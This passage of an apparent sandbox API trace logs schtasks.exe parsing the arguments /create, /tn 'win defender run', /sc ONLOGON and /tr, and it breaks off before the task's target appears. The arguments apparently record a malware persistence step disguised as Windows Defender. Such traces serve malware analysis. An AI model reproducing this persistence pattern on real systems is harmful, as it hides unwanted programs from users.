dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x4789dc0 | out: lpData=0x4789dc0) returned 1 [0189.118] VerQueryValueW (in: pBlock=0x4789dc0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdfb0c, puLen=0xdfb10 | out: lplpBuffer=0xdfb0c*=0x478a170, puLen=0xdfb10) returned 1 [0189.128] _memicmp (_Buf1=0x47873e0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.129] _vsnwprintf (in: _Buffer=0x4788ce8, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdfaf0 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0189.129] VerQueryValueW (in: pBlock=0x4789dc0, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdfb1c, puLen=0xdfb18 | out: lplpBuffer=0xdfb1c*=0x4789fa0, puLen=0xdfb18) returned 1 [0189.129] lstrlenW (lpString="schtasks.exe") returned 12 [0189.129] lstrlenW (lpString="schtasks.exe") returned 12 [0189.129] lstrlenW (lpString=".EXE") returned 4 [0189.130] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0189.130] lstrlenW (lpString="schtasks.exe") returned 12 [0189.130] lstrlenW (lpString=".EXE") returned 4 [0189.130] _memicmp (_Buf1=0x47873e0, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.130] lstrlenW (lpString="schtasks") returned 8 [0189.131] GetProcessHeap () returned 0x4780000 [0189.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x47895d0 [0189.131] GetProcessHeap () returned 0x4780000 [0189.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789430 [0189.131] GetProcessHeap () returned 0x4780000 [0189.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789670 [0189.131] GetProcessHeap () returned 0x4780000 [0189.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789370 [0189.131] GetProcessHeap () returned 0x4780000 [0189.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x4787488 [0189.131] _memicmp (_Buf1=0x4787488, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.131] GetProcessHeap () returned 0x4780000 [0189.131] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0xa0) returned 0x47869e8 [0189.132] GetProcessHeap () returned 0x4780000 [0189.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789450 [0189.132] GetProcessHeap () returned 0x4780000 [0189.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789530 [0189.132] GetProcessHeap () returned 0x4780000 [0189.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789610 [0189.132] GetProcessHeap () returned 0x4780000 [0189.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x4787380 [0189.132] _memicmp (_Buf1=0x4787380, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.132] GetProcessHeap () returned 0x4780000 [0189.132] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x200) returned 0x478a7a0 [0189.133] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x478a7a0, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0189.133] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0189.133] GetProcessHeap () returned 0x4780000 [0189.133] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x30) returned 0x4786a90 [0189.133] _vsnwprintf (in: _Buffer=0x47869e8, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdfaf4 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29 [0189.133] GetProcessHeap () returned 0x4780000 [0189.133] GetProcessHeap () returned 0x4780000 [0189.134] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x4789dc0) returned 1 [0189.134] GetProcessHeap () returned 0x4780000 [0189.134] RtlSizeHeap (HeapHandle=0x4780000, Flags=0x0, MemoryPointer=0x4789dc0) returned 0x776 [0189.134] RtlFreeHeap (HeapHandle=0x4780000, Flags=0x0, BaseAddress=0x4789dc0) returned 1 [0189.134] RtlRestoreLastWin32Error () returned 0x0 [0189.134] GetThreadLocale () returned 0x409 [0189.134] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.134] lstrlenW (lpString="?") returned 1 [0189.134] GetThreadLocale () returned 0x409 [0189.134] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.134] lstrlenW (lpString="create") returned 6 [0189.134] GetThreadLocale () returned 0x409 [0189.134] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.134] lstrlenW (lpString="delete") returned 6 [0189.135] GetThreadLocale () returned 0x409 [0189.135] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.135] lstrlenW (lpString="query") returned 5 [0189.135] GetThreadLocale () returned 0x409 [0189.135] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.135] lstrlenW (lpString="change") returned 6 [0189.135] GetThreadLocale () returned 0x409 [0189.135] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.135] lstrlenW (lpString="run") returned 3 [0189.135] GetThreadLocale () returned 0x409 [0189.135] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.135] lstrlenW (lpString="end") returned 3 [0189.135] GetThreadLocale () returned 0x409 [0189.135] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.135] lstrlenW (lpString="showsid") returned 7 [0189.135] GetThreadLocale () returned 0x409 [0189.136] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0189.136] RtlRestoreLastWin32Error () returned 0x0 [0189.136] RtlRestoreLastWin32Error () returned 0x0 [0189.136] lstrlenW (lpString="/create") returned 7 [0189.136] lstrlenW (lpString="-/") returned 2 [0189.136] StrChrIW (lpStart="-/", wMatch=0x471002f) returned="/" [0189.136] lstrlenW (lpString="?") returned 1 [0189.136] lstrlenW (lpString="?") returned 1 [0189.136] GetProcessHeap () returned 0x4780000 [0189.136] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x4787440 [0189.136] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.136] GetProcessHeap () returned 0x4780000 [0189.136] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0xa) returned 0x47873b0 [0189.136] lstrlenW (lpString="create") returned 6 [0189.136] GetProcessHeap () returned 0x4780000 [0189.136] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x4787470 [0189.136] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.136] GetProcessHeap () returned 0x4780000 [0189.136] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789590 [0189.137] _vsnwprintf (in: _Buffer=0x47873b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0189.137] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0189.137] lstrlenW (lpString="|?|") returned 3 [0189.137] lstrlenW (lpString="|create|") returned 8 [0189.137] RtlRestoreLastWin32Error () returned 0x490 [0189.137] lstrlenW (lpString="create") returned 6 [0189.137] lstrlenW (lpString="create") returned 6 [0189.137] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.137] GetProcessHeap () returned 0x4780000 [0189.137] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47873b0) returned 1 [0189.137] GetProcessHeap () returned 0x4780000 [0189.137] RtlReAllocateHeap (Heap=0x4780000, Flags=0xc, Ptr=0x47873b0, Size=0x14) returned 0x47895b0 [0189.137] lstrlenW (lpString="create") returned 6 [0189.137] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.137] _vsnwprintf (in: _Buffer=0x47895b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0189.137] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0189.137] lstrlenW (lpString="|create|") returned 8 [0189.137] lstrlenW (lpString="|create|") returned 8 [0189.138] StrStrIW (lpFirst="|create|", lpSrch="|create|") returned="|create|" [0189.138] RtlRestoreLastWin32Error () returned 0x0 [0189.138] RtlRestoreLastWin32Error () returned 0x0 [0189.138] RtlRestoreLastWin32Error () returned 0x0 [0189.138] lstrlenW (lpString="/tn") returned 3 [0189.138] lstrlenW (lpString="-/") returned 2 [0189.138] StrChrIW (lpStart="-/", wMatch=0x471002f) returned="/" [0189.138] lstrlenW (lpString="?") returned 1 [0189.138] lstrlenW (lpString="?") returned 1 [0189.138] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.138] lstrlenW (lpString="tn") returned 2 [0189.138] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.138] _vsnwprintf (in: _Buffer=0x47895b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0189.138] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0189.138] lstrlenW (lpString="|?|") returned 3 [0189.138] lstrlenW (lpString="|tn|") returned 4 [0189.138] RtlRestoreLastWin32Error () returned 0x490 [0189.138] lstrlenW (lpString="create") returned 6 [0189.138] lstrlenW (lpString="create") returned 6 [0189.138] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.139] lstrlenW (lpString="tn") returned 2 [0189.139] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.139] _vsnwprintf (in: _Buffer=0x47895b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0189.139] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0189.139] lstrlenW (lpString="|create|") returned 8 [0189.139] lstrlenW (lpString="|tn|") returned 4 [0189.139] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0189.139] RtlRestoreLastWin32Error () returned 0x490 [0189.139] lstrlenW (lpString="delete") returned 6 [0189.139] lstrlenW (lpString="delete") returned 6 [0189.139] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.139] lstrlenW (lpString="tn") returned 2 [0189.139] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.139] _vsnwprintf (in: _Buffer=0x47895b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0189.139] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0189.139] lstrlenW (lpString="|delete|") returned 8 [0189.139] lstrlenW (lpString="|tn|") returned 4 [0189.139] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0 [0189.140] RtlRestoreLastWin32Error () returned 0x490 [0189.140] lstrlenW (lpString="query") returned 5 [0189.140] lstrlenW (lpString="query") returned 5 [0189.140] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.140] lstrlenW (lpString="tn") returned 2 [0189.140] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.140] _vsnwprintf (in: _Buffer=0x47895b0, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7 [0189.140] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0189.140] lstrlenW (lpString="|query|") returned 7 [0189.140] lstrlenW (lpString="|tn|") returned 4 [0189.140] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0 [0189.140] RtlRestoreLastWin32Error () returned 0x490 [0189.140] lstrlenW (lpString="change") returned 6 [0189.140] lstrlenW (lpString="change") returned 6 [0189.140] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.140] lstrlenW (lpString="tn") returned 2 [0189.140] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.141] _vsnwprintf (in: _Buffer=0x47895b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8 [0189.141] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0189.141] lstrlenW (lpString="|change|") returned 8 [0189.141] lstrlenW (lpString="|tn|") returned 4 [0189.141] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0 [0189.141] RtlRestoreLastWin32Error () returned 0x490 [0189.141] lstrlenW (lpString="run") returned 3 [0189.141] lstrlenW (lpString="run") returned 3 [0189.141] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.141] lstrlenW (lpString="tn") returned 2 [0189.141] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.141] _vsnwprintf (in: _Buffer=0x47895b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5 [0189.141] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0189.141] lstrlenW (lpString="|run|") returned 5 [0189.142] lstrlenW (lpString="|tn|") returned 4 [0189.142] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0 [0189.142] RtlRestoreLastWin32Error () returned 0x490 [0189.142] lstrlenW (lpString="end") returned 3 [0189.142] lstrlenW (lpString="end") returned 3 [0189.142] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.142] lstrlenW (lpString="tn") returned 2 [0189.142] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.142] _vsnwprintf (in: _Buffer=0x47895b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5 [0189.142] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0189.142] lstrlenW (lpString="|end|") returned 5 [0189.142] lstrlenW (lpString="|tn|") returned 4 [0189.142] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0 [0189.142] RtlRestoreLastWin32Error () returned 0x490 [0189.142] lstrlenW (lpString="showsid") returned 7 [0189.142] lstrlenW (lpString="showsid") returned 7 [0189.142] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.142] GetProcessHeap () returned 0x4780000 [0189.142] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x47895b0) returned 1 [0189.142] GetProcessHeap () returned 0x4780000 [0189.142] RtlReAllocateHeap (Heap=0x4780000, Flags=0xc, Ptr=0x47895b0, Size=0x16) returned 0x4789470 [0189.143] lstrlenW (lpString="tn") returned 2 [0189.143] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.143] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9 [0189.143] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0189.143] lstrlenW (lpString="|showsid|") returned 9 [0189.143] lstrlenW (lpString="|tn|") returned 4 [0189.143] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0 [0189.143] RtlRestoreLastWin32Error () returned 0x490 [0189.143] RtlRestoreLastWin32Error () returned 0x490 [0189.143] RtlRestoreLastWin32Error () returned 0x0 [0189.143] lstrlenW (lpString="/tn") returned 3 [0189.143] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0 [0189.143] RtlRestoreLastWin32Error () returned 0x490 [0189.143] RtlRestoreLastWin32Error () returned 0x0 [0189.143] lstrlenW (lpString="/tn") returned 3 [0189.143] GetProcessHeap () returned 0x4780000 [0189.143] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x8) returned 0x4786c78 [0189.143] GetProcessHeap () returned 0x4780000 [0189.143] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789550 [0189.144] RtlRestoreLastWin32Error () returned 0x0 [0189.144] RtlRestoreLastWin32Error () returned 0x0 [0189.144] lstrlenW (lpString="win defender run") returned 16 [0189.144] lstrlenW (lpString="-/") returned 2 [0189.144] StrChrIW (lpStart="-/", wMatch=0x4710077) returned 0x0 [0189.144] RtlRestoreLastWin32Error () returned 0x490 [0189.144] RtlRestoreLastWin32Error () returned 0x490 [0189.144] RtlRestoreLastWin32Error () returned 0x0 [0189.144] lstrlenW (lpString="win defender run") returned 16 [0189.144] StrChrIW (lpStart="win defender run", wMatch=0x3a) returned 0x0 [0189.144] RtlRestoreLastWin32Error () returned 0x490 [0189.144] RtlRestoreLastWin32Error () returned 0x0 [0189.144] lstrlenW (lpString="win defender run") returned 16 [0189.144] GetProcessHeap () returned 0x4780000 [0189.144] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x22) returned 0x4788fc8 [0189.144] GetProcessHeap () returned 0x4780000 [0189.144] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x47893b0 [0189.144] RtlRestoreLastWin32Error () returned 0x0 [0189.144] RtlRestoreLastWin32Error () returned 0x0 [0189.144] lstrlenW (lpString="/sc") returned 3 [0189.144] lstrlenW (lpString="-/") returned 2 [0189.144] StrChrIW (lpStart="-/", wMatch=0x471002f) returned="/" [0189.145] lstrlenW (lpString="?") returned 1 [0189.145] lstrlenW (lpString="?") returned 1 [0189.145] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.145] lstrlenW (lpString="sc") returned 2 [0189.145] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.145] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0189.145] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0189.145] lstrlenW (lpString="|?|") returned 3 [0189.145] lstrlenW (lpString="|sc|") returned 4 [0189.145] RtlRestoreLastWin32Error () returned 0x490 [0189.145] lstrlenW (lpString="create") returned 6 [0189.145] lstrlenW (lpString="create") returned 6 [0189.145] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.145] lstrlenW (lpString="sc") returned 2 [0189.145] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.145] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0189.145] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0189.146] lstrlenW (lpString="|create|") returned 8 [0189.146] lstrlenW (lpString="|sc|") returned 4 [0189.146] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0189.146] RtlRestoreLastWin32Error () returned 0x490 [0189.146] lstrlenW (lpString="delete") returned 6 [0189.146] lstrlenW (lpString="delete") returned 6 [0189.146] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.146] lstrlenW (lpString="sc") returned 2 [0189.146] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.146] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0189.146] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0189.146] lstrlenW (lpString="|delete|") returned 8 [0189.146] lstrlenW (lpString="|sc|") returned 4 [0189.146] StrStrIW (lpFirst="|delete|", lpSrch="|sc|") returned 0x0 [0189.146] RtlRestoreLastWin32Error () returned 0x490 [0189.146] lstrlenW (lpString="query") returned 5 [0189.146] lstrlenW (lpString="query") returned 5 [0189.146] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.146] lstrlenW (lpString="sc") returned 2 [0189.147] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.147] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7 [0189.147] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0189.147] lstrlenW (lpString="|query|") returned 7 [0189.147] lstrlenW (lpString="|sc|") returned 4 [0189.147] StrStrIW (lpFirst="|query|", lpSrch="|sc|") returned 0x0 [0189.147] RtlRestoreLastWin32Error () returned 0x490 [0189.147] lstrlenW (lpString="change") returned 6 [0189.147] lstrlenW (lpString="change") returned 6 [0189.147] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.147] lstrlenW (lpString="sc") returned 2 [0189.147] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.147] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8 [0189.147] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0189.147] lstrlenW (lpString="|change|") returned 8 [0189.147] lstrlenW (lpString="|sc|") returned 4 [0189.147] StrStrIW (lpFirst="|change|", lpSrch="|sc|") returned 0x0 [0189.147] RtlRestoreLastWin32Error () returned 0x490 [0189.147] lstrlenW (lpString="run") returned 3 [0189.148] lstrlenW (lpString="run") returned 3 [0189.148] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.148] lstrlenW (lpString="sc") returned 2 [0189.148] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.148] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5 [0189.148] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0189.148] lstrlenW (lpString="|run|") returned 5 [0189.148] lstrlenW (lpString="|sc|") returned 4 [0189.148] StrStrIW (lpFirst="|run|", lpSrch="|sc|") returned 0x0 [0189.148] RtlRestoreLastWin32Error () returned 0x490 [0189.148] lstrlenW (lpString="end") returned 3 [0189.148] lstrlenW (lpString="end") returned 3 [0189.148] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.148] lstrlenW (lpString="sc") returned 2 [0189.148] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.148] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5 [0189.149] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0189.149] lstrlenW (lpString="|end|") returned 5 [0189.149] lstrlenW (lpString="|sc|") returned 4 [0189.149] StrStrIW (lpFirst="|end|", lpSrch="|sc|") returned 0x0 [0189.149] RtlRestoreLastWin32Error () returned 0x490 [0189.149] lstrlenW (lpString="showsid") returned 7 [0189.149] lstrlenW (lpString="showsid") returned 7 [0189.149] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.149] lstrlenW (lpString="sc") returned 2 [0189.149] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.149] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9 [0189.149] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|sc|") returned 4 [0189.149] lstrlenW (lpString="|showsid|") returned 9 [0189.149] lstrlenW (lpString="|sc|") returned 4 [0189.149] StrStrIW (lpFirst="|showsid|", lpSrch="|sc|") returned 0x0 [0189.149] RtlRestoreLastWin32Error () returned 0x490 [0189.149] RtlRestoreLastWin32Error () returned 0x490 [0189.149] RtlRestoreLastWin32Error () returned 0x0 [0189.149] lstrlenW (lpString="/sc") returned 3 [0189.149] StrChrIW (lpStart="/sc", wMatch=0x3a) returned 0x0 [0189.150] RtlRestoreLastWin32Error () returned 0x490 [0189.150] RtlRestoreLastWin32Error () returned 0x0 [0189.150] lstrlenW (lpString="/sc") returned 3 [0189.150] GetProcessHeap () returned 0x4780000 [0189.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x8) returned 0x47827e8 [0189.150] GetProcessHeap () returned 0x4780000 [0189.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x47893d0 [0189.150] RtlRestoreLastWin32Error () returned 0x0 [0189.150] RtlRestoreLastWin32Error () returned 0x0 [0189.150] lstrlenW (lpString="ONLOGON") returned 7 [0189.150] lstrlenW (lpString="-/") returned 2 [0189.150] StrChrIW (lpStart="-/", wMatch=0x471004f) returned 0x0 [0189.150] RtlRestoreLastWin32Error () returned 0x490 [0189.150] RtlRestoreLastWin32Error () returned 0x490 [0189.150] RtlRestoreLastWin32Error () returned 0x0 [0189.150] lstrlenW (lpString="ONLOGON") returned 7 [0189.150] StrChrIW (lpStart="ONLOGON", wMatch=0x3a) returned 0x0 [0189.150] RtlRestoreLastWin32Error () returned 0x490 [0189.150] RtlRestoreLastWin32Error () returned 0x0 [0189.150] lstrlenW (lpString="ONLOGON") returned 7 [0189.150] GetProcessHeap () returned 0x4780000 [0189.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x47873b0 [0189.150] GetProcessHeap () returned 0x4780000 [0189.150] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x14) returned 0x4789330 [0189.151] RtlRestoreLastWin32Error () returned 0x0 [0189.151] RtlRestoreLastWin32Error () returned 0x0 [0189.151] lstrlenW (lpString="/tr") returned 3 [0189.151] lstrlenW (lpString="-/") returned 2 [0189.151] StrChrIW (lpStart="-/", wMatch=0x471002f) returned="/" [0189.151] lstrlenW (lpString="?") returned 1 [0189.151] lstrlenW (lpString="?") returned 1 [0189.151] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.151] lstrlenW (lpString="tr") returned 2 [0189.151] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.151] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0189.151] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tr|") returned 4 [0189.151] lstrlenW (lpString="|?|") returned 3 [0189.151] lstrlenW (lpString="|tr|") returned 4 [0189.151] RtlRestoreLastWin32Error () returned 0x490 [0189.152] 